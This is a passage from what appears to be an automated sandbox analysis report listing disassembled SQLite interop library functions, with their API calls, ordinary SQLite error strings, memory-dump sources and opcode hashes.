                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.I943321d364f02e5d.Ifc350ae509dc2b53.
                                                                                      • String ID: JSON path error near '%q'
                                                                                      • API String ID: 3872428967-481711382
                                                                                      • Opcode ID: 263ea062ba8ae93684cc100407fe9b2adf44a2b6c9030b6ccc807ce211adc06a
                                                                                      • Instruction ID: 2c83e619604705462db1c31085a89310dd5b1ffd399b776e1d605311c99ccb12
                                                                                      • Opcode Fuzzy Hash: 263ea062ba8ae93684cc100407fe9b2adf44a2b6c9030b6ccc807ce211adc06a
                                                                                      • Instruction Fuzzy Hash: 8D018E3190812127DB10EE58AC00EAB7B9ADF46338F248369FC38567C1EB32D90487D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4C68D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011517,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe,?,?,?,?,?,6C4C6851), ref: 6C4C68FE
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4C68F7
                                                                                      • database corruption, xrefs: 6C4C68F2
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4C68E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$database corruption
                                                                                      • API String ID: 1952225102-2363313300
                                                                                      • Opcode ID: 2f9bc6b37fb138840476bc188c8cbf6f80044cbb142ebd9b858534fde89d7194
                                                                                      • Instruction ID: 985f8598db84db36bebd53d4945c9a1f1e524c0580667738167034dabe892ace
                                                                                      • Opcode Fuzzy Hash: 2f9bc6b37fb138840476bc188c8cbf6f80044cbb142ebd9b858534fde89d7194
                                                                                      • Instruction Fuzzy Hash: E801493A70499176C310CF6D9880DB6FBE5FF99215740016EE658C3B52E322BD21C7E1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4DEEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4DEF6D
                                                                                      • misuse, xrefs: 6C4DEF68
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4DEF5E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 0-1203237178
                                                                                      • Opcode ID: f64306ffb4df397b91d8088247615a1a91e89ec23a2fa31b1ec5f484d462bd84
                                                                                      • Instruction ID: 0b16b82c43fe6fbce4f0cb8af19781b7206bc59d0b6a47f2e5b4dcafcc4705da
                                                                                      • Opcode Fuzzy Hash: f64306ffb4df397b91d8088247615a1a91e89ec23a2fa31b1ec5f484d462bd84
                                                                                      • Instruction Fuzzy Hash: EC01C231A0A25497D700EE58D854F9BB7D49B84719F10064EFC5CAB742E3B2D91447D7
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446B80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029454,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C446BB7
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446BB0
                                                                                      • misuse, xrefs: 6C446BAB
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C446BA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 6dc8410af438c9f5a4f7ca07d4f84e2faf966ecb9d794a4320386312351d34f6
                                                                                      • Instruction ID: fc015c11014a8051947fcc355fe275cf21b3800e17c61c1576771179c4e17d3d
                                                                                      • Opcode Fuzzy Hash: 6dc8410af438c9f5a4f7ca07d4f84e2faf966ecb9d794a4320386312351d34f6
                                                                                      • Instruction Fuzzy Hash: 4B118BB07002959BEF00EF78EC44ECB7BE8AF04319F004829F96DD7B00E671E4508A91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446DF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000293D6,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C446E18
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446E11
                                                                                      • misuse, xrefs: 6C446E0C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C446E02
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 494fdb985d797124182403cdf1712828f05cb11998b7e348da28bcd5bbb8a288
                                                                                      • Instruction ID: f581db7002648213f1ee2dd0b4e5b037beec0b09a83f5d210daf3bd61a61e636
                                                                                      • Opcode Fuzzy Hash: 494fdb985d797124182403cdf1712828f05cb11998b7e348da28bcd5bbb8a288
                                                                                      • Instruction Fuzzy Hash: D301F1713003805BEB18DF79DC14E9BBBE4EF4121AF14482EE95AD3B01D670F4008795
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446E80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000293B7,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C446EA8
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446EA1
                                                                                      • misuse, xrefs: 6C446E9C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C446E92
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 3a37eabbdddcf8f640e53913334195fd8d6abfcbbed20c054db5bdaf68f39fa8
                                                                                      • Instruction ID: 79086cdea3b248fcb5b07aa727271fe0edb5eb38c43692b34e8bd285e35a068a
                                                                                      • Opcode Fuzzy Hash: 3a37eabbdddcf8f640e53913334195fd8d6abfcbbed20c054db5bdaf68f39fa8
                                                                                      • Instruction Fuzzy Hash: 4601BC707007869BEB04DF79DC44E9777E8AB0061AB20882EE91AD7B01E620E41087A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446F10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002939F,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C446F38
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446F31
                                                                                      • misuse, xrefs: 6C446F2C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C446F22
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: eb49515d7df44a6b62da06f0e0f9810286006119244d89bb0a424d5eb76f9310
                                                                                      • Instruction ID: 9f50db7362ce254e97f21b1d901758200c42d3cf1fa9bc474814744bd7f6292f
                                                                                      • Opcode Fuzzy Hash: eb49515d7df44a6b62da06f0e0f9810286006119244d89bb0a424d5eb76f9310
                                                                                      • Instruction Fuzzy Hash: 4101A2717107855BEB04EB699C05E97B7A8DF80219B04482EF95ED7B01DA30E80487A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C43EAD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI1c7a7970970b9619.SQLITE.INTEROP(illegal first argument to %s), ref: 6C43EB06
                                                                                      • SIfc350ae509dc2b53.SQLITE.INTEROP(00000000,000000FF,000000FF,00000001), ref: 6C43EB26
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I1c7a7970970b9619.Ifc350ae509dc2b53.
                                                                                      • String ID: fts3cursor$illegal first argument to %s
                                                                                      • API String ID: 1339256467-2723373918
                                                                                      • Opcode ID: 81af79e10bf9321d2435b8ccf9d93acdfcf6a49c44014397361e494e3ddedf09
                                                                                      • Instruction ID: 13f235d2cb8d8befed89d1dde27caabfa987a843ff0c7a6a696ce3980bdf15ee
                                                                                      • Opcode Fuzzy Hash: 81af79e10bf9321d2435b8ccf9d93acdfcf6a49c44014397361e494e3ddedf09
                                                                                      • Instruction Fuzzy Hash: ABF046327141293BDB109A5DAC40EEA7748CB8127AF200379FD3C937C0EA62AC1582F2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4442D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029D39,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4442F8
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4442F1
                                                                                      • misuse, xrefs: 6C4442EC
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4442E2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: a843191d0b3abd43ceafc345ba44f0f9fb818f416804137f62360d45964f4700
                                                                                      • Instruction ID: f831c48b3aaf3c7dc4d62131bdf9e199d615dbc3e0ad5c6a92c76e5020a8a8b8
                                                                                      • Opcode Fuzzy Hash: a843191d0b3abd43ceafc345ba44f0f9fb818f416804137f62360d45964f4700
                                                                                      • Instruction Fuzzy Hash: B201A4313011145BEB04EF69B850EAA37D6EB80A9EF1588ADE91DCBB42DB20E81146C5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4945C0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0001B94E,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C4945E8
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C4945E1
                                                                                      • misuse, xrefs: 6C4945DC
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C4945D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 2bbcc10015ce86e1003829d8c7c7765992013abc2228a8cc681ed36bc81837cf
                                                                                      • Instruction ID: f9b46ccc87cacea5fb0b9bf61cd83c2ecdea8370f0823fa3fe980af2b849241d
                                                                                      • Opcode Fuzzy Hash: 2bbcc10015ce86e1003829d8c7c7765992013abc2228a8cc681ed36bc81837cf
                                                                                      • Instruction Fuzzy Hash: 3201D1B070069457EF08EB79DC08E9B7BA8AF4075AF00042DF92AD7B41EB34E80186D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C4DBCF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000007,failed to %s %u bytes (%lu), heap=%p,HeapReAlloc,?,00000000), ref: 6C4DBD46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: HeapAlloc$HeapReAlloc$failed to %s %u bytes (%lu), heap=%p
                                                                                      • API String ID: 1952225102-2123888023
                                                                                      • Opcode ID: 1dc365934d55c6f170f54547378d398ee1276042ef51490ead252d4e7316d876
                                                                                      • Instruction ID: f9ec48b5f770b3d460c386d8c4b79728439750aec6cda10bdf6fd0cc023479a0
                                                                                      • Opcode Fuzzy Hash: 1dc365934d55c6f170f54547378d398ee1276042ef51490ead252d4e7316d876
                                                                                      • Instruction Fuzzy Hash: DCF062B1B002097BDB00AB9A8D8AE57B7BDDB96699F4101AABD08DB700D670ED0046A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446C70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00029426,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C446C98
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446C91
                                                                                      • misuse, xrefs: 6C446C8C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C446C82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 130c635ef9f270b3a4b6155f60a4b7090a9a524bb8b5add09081c9819b7c722f
                                                                                      • Instruction ID: e06ce6335f359760a3562016e38a469fe02dbd547d34ecd4680f9d533c3ed444
                                                                                      • Opcode Fuzzy Hash: 130c635ef9f270b3a4b6155f60a4b7090a9a524bb8b5add09081c9819b7c722f
                                                                                      • Instruction Fuzzy Hash: 92F081717006455BEB14EF6AEC05E97B7A8EF84659F04483AFD2AD3B01E630E41086D1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446CF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002940D,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C446D18
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446D11
                                                                                      • misuse, xrefs: 6C446D0C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C446D02
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3413105538.000000006C3D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414620541.000000006C4E8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414853788.000000006C511000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3414914787.000000006C515000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6c3d0000_LnSNtO8JIa.jbxd
                                                                                      Similarity
                                                                                      • API ID: I950480ab972e108d.
                                                                                      • String ID: %s at line %d of [%.10s]$b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe$misuse
                                                                                      • API String ID: 1952225102-1203237178
                                                                                      • Opcode ID: 43d5754da8c56f4a82034f817d6f6bcc28bbfbe87deccb71241e76ec11fe654a
                                                                                      • Instruction ID: 34690350f638575bcb72f8b0b64ea62a6ae4f5211b69aef36e1566d9db0fc6f0
                                                                                      • Opcode Fuzzy Hash: 43d5754da8c56f4a82034f817d6f6bcc28bbfbe87deccb71241e76ec11fe654a
                                                                                      • Instruction Fuzzy Hash: 95F081B57007455BEB14EB69AC05E97B7A8EF8421AF05883EF92DD3B01EA31E4048691
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 6C446D70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 6C4DCC30: SI950480ab972e108d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6C447249,00000000,?,?,00000000,00000000,6C3E5DC0), ref: 6C4DCC41
                                                                                      • SI950480ab972e108d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000293F4,b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe), ref: 6C446D98
                                                                                      Strings
                                                                                      • %s at line %d of [%.10s], xrefs: 6C446D91
                                                                                      • misuse, xrefs: 6C446D8C
                                                                                      • b0c4230c89fa729aacfe074159788b5b2ac7a82f42cd25d0dc536bcaca6a93fe, xrefs: 6C446D82
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3413163739.000000006C3D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C3D0000, based on PE: true
